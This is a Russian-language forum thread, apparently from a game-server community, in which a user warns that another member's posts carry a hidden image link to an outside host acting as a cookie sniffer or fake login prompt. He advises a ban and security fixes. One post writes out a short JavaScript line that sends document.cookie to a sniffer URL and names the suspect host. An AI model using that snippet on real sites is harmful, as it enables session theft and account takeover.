Jump to content

Для доступа к серверу gazxsw.zz.mu необходима авторизация.


Recommended Posts

Понял в чем фишка.

 

http://forum.pandawow.ru/member.php?u=3761 - этот пользователь в каждом посте оставляет ссылку на картинку, которую не отображает. Ее адрес http:// qazxsw .zz .mu /smile.php . Как вы думаете что это? Это снифер. Во всяком случае этот способ работал около 5-ти лет назад на юкозах и прочей дряни. Если вкрыть его пост, я уверен там будет что-то на подобии " img=new Image () ; img. scr =” http ://сайт/путь/к/cнифферу.php ?s =”+escape(document.cookie); ". В итоге, он тырит у вас кукисы , ну а дальше вы понимаете) . Либо, то окно которое появляется, просит авторизации, юзверь думает что это на форуме реги слетела и авторизуется под своим логином/паролем на сайте злоумышленника, я хз че он задумал, но это старо. Просто дайте этому кхе-кхе бан по айпишнику, отключите ХТМЛ коды, запретите подмену куков , ну и проверьтесь на дыры)

 

- - - Добавлено - - -

 

http://rghost.ru/46175865/image.png

 

- - - Добавлено - - -

 

Обновлено, АП.

 

- - - Добавлено - - -

 

Оперативно забанили, а теперь еще и айпишник его в блок давайте)

Edited by crashik
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...